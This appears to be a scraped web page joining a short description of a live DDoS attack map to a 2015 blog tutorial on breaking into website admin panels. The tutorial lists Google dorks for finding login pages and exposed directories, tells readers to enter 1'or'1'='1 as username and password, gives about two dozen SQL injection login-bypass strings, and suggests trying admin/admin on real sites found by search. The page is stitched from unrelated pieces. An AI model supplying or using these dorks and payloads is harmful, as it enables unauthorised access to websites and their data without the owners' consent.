Live Ddos View

Live DDoS Attack Map | Apakau

Live DDoS Attack Map

This map is the fruit of collaboration between Google Ideas and Arbor Networks in an effort to raise awareness about distributed denial of service attacks in the world everyday.

Exploring the Data

The Digital Attack Map displays global DDoS activity on any given day. Attacks are displayed as dotted lines, scaled to size, and placed according to the source and destination countries of the attack traffic when known. Some features include:

  • Use the histogram at the bottom of the map to explore historical data.
  • Select a country to view DDoS activity to or from that country.
  • Use the color option to view attacks by class, duration, or source/destination port.
  • Use the news section to find online reports of attack activity from a specified time.
  • View the gallery to explore some examples of days with notable DDoS attacks.

Sign Up

Monday, July 6, 2015

[SQLi] Hack Admin Account Website


We're gonna hack into an admin account, using SQL injections.

How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.

Dorks:

    inurl:adminlogin.aspx

    inurl:admin/index.php

    inurl:administrator.php

    inurl:administrator.asp

    inurl:login.asp

    inurl:login.aspx

    inurl:login.php

    inurl:admin/index.php


    inurl:adminlogin.aspx

LET'S START !


Step 1: Go to Google, typ in ''admin/login.asp site:net'' and search (You can also use the option, to search only in your country).


Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''website.com/admin/login.asp''.


Step 3: Go to the website admin login page, type in:
username: 1'or'1'='1
password: 1'or'1'='1


NOW .. IT'S DONE ! .. WE ARE NOW LOG AS ADMINISTRATOR !

Other InjecTion Queries Code:

    ‘ or 1=1 –

    1'or’1'=’1

    admin’–

    ” or 0=0 –

    or 0=0 –

    ‘ or 0=0 #

    ” or 0=0 #

    or 0=0 #

    ‘ or ‘x’='x

    ” or “x”=”x

    ‘) or (‘x’='x

    ‘ or 1=1–

    ” or 1=1–

    or 1=1–

    ‘ or a=a–

    ” or “a”=”a

    ‘) or (‘a’='a

    “) or (“a”=”a

    hi” or “a”=”a

    hi” or 1=1 –

    hi’ or 1=1 –

    hi’ or ‘a’='a


    hi’) or (‘a’='a

================================================
================================================

some other google dorks i am going to provide you which i personally use.

intitle:"Index of /admin/css/" site:.com
intitle:"index of /gallery" site:.com
intitle:"index of /admin/photos" site:.com
intitle:"index of /images" site:.com
intitle:"index of /css" site:.com
intitle:"index of /js" site:.com
intitle:"index of admin/css" site:.com
intitle:"index of admin/js" site:.com
intitle:"index of admin/gallery" site:.com
intitle:"index of admin/uploads" site:.com


now go to admin area and put
user: admin
pass: admin

NOW .. IT'S DONE ! .. WE ARE NOW LOG AS ADMINISTRATOR !
- See more at: http://www.cyberadda.com/2014/08/sqli-hack-admin-account-website.html#sthash.Txsgk2Ez.dpuf
    ” or “x”=”x